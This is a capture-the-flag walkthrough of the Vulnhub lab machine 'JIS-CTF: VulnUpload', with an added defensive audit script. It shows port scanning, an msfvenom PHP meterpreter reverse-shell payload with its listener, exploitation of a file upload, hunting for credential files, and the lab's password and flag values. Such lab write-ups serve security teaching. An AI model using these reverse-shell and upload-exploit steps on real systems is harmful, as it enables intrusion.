Vulnhub JIS-CTF: VulnUpload Writeup

This is a walkthrough of the Vulnhub machine ‘JIS-CTF: VulnUpload’, released on Feb 8, 2018, by Mohammad Khreesha. I imported the virtual machine into VirtualBox in bridged mode. The machine has five flags waiting to be captured en route to “r00t” access.

Attacker IP:
Server IP:

Using Nmap to enumerate open ports and their respective services:

root@kali:~# nmap -sC -sV
Starting Nmap 7.60 ( ) at 2018-03-12 00:26 IST
Nmap scan report for (
Host is up (0.00021s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:b9:68:38:77:7c:40:f6:bf:98:09:ff:d9:5f:73:ec (RSA)
|   256 b9:df:60:1e:6d:6f:d7:f6:24:fd:ae:f8:e3:cf:16:ac (ECDSA)
|_  256 78:5a:95:bb:d5:bf:ad:cf:b2:f5:0f:c0:0c:af:f7:76 (EdDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 8 disallowed entries 
| / /backup /admin /admin_area /r00t /uploads 
|_/uploaded_files /flag
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Sign-Up/Login Form
|_Requested resource was login.php
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds

Browsing gives

Checking robots.txt file, browsing

root@kali:~# curl
User-agent: *
Disallow: /
Disallow: /backup
Disallow: /admin
Disallow: /admin_area
Disallow: /r00t
Disallow: /uploads
Disallow: /uploaded_files
Disallow: /flag

Browsing gives first flag.

Browsing gives second flag and login credentials

Logging in with the same credentials at gives,

The file upload functionality is exploited to get a reverse shell by uploading a PHP file containing a meterpreter payload created using msfvenom.

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=1337 -f raw > shelled.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes

Also, setting up a reverse shell handler at port 1337

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST
msf exploit(multi/handler) > set LPORT 1337
LPORT => 1337
msf exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 

Uploading the created shelled.php and browsing gives a reverse meterpreter connection

Onto the third flag,

$ pwd    
$ cd ..
$ ls      
$ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

As the hint suggests finding user technawi's credentials, I enumerated the files owned by user technawi (note that I ignored all warnings).

$ find / -user technawi -type f 2>&1 | grep -v "Permission" | grep -v "No such"
$ cat /etc/mysql/conf.d/credentials.txt
The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor
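
Seen from the defender's side, the find step above works because a file holding a plaintext password was readable by the web server account. The audit below is an added example, not part of the original walkthrough; the function names and the password-line pattern are assumptions, and directories above the chosen root are assumed reachable.

```shell
#!/bin/sh
# Added example: defender's audit, not part of the original writeup.
# Assumed pattern for "looks like a stored password"; tune it for your estate.
SECRET_RE='^[[:space:]]*(password|passwd|pwd)[[:space:]]*[:=]'

# other_can_traverse FILE ROOT
# Succeeds when every directory from FILE's parent up to ROOT has the
# other-execute bit, i.e. an unrelated account can actually reach FILE.
# Directories above ROOT are assumed reachable and are not checked.
other_can_traverse() {
    d=$(dirname -- "$1")
    while :; do
        # The 10th character of the ls mode string is the other-execute bit.
        case "$(ls -ld -- "$d" | cut -c10)" in
            x|t) ;;
            *) return 1 ;;
        esac
        case "$d" in "$2"|/|.) return 0 ;; esac
        d=$(dirname -- "$d")
    done
}

# audit_exposed_secrets OWNER ROOT
# OWNER is a user name or numeric uid. Prints one path per line for each
# file under ROOT that OWNER owns, that is world-readable, that other
# accounts can reach, and that contains a password-like line.
audit_exposed_secrets() {
    owner=$1
    root=${2%/}
    [ -n "$root" ] || root=/
    find "$root" -xdev -type f -user "$owner" -perm -o=r \
        -exec grep -Eil -- "$SECRET_RE" {} + 2>/dev/null |
    while IFS= read -r f; do
        if other_can_traverse "$f" "$root"; then
            printf '%s\n' "$f"
        fi
    done
}
```

Run as root, for example `audit_exposed_secrets technawi /etc`; each reported file should have its mode tightened (for instance to 600) or the secret moved out of it.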

Using the obtained credentials, log in over SSH to get access with user technawi's privileges, then elevate to root privileges using sudo access.
The fifth flag is found in the folder /var/www/html.
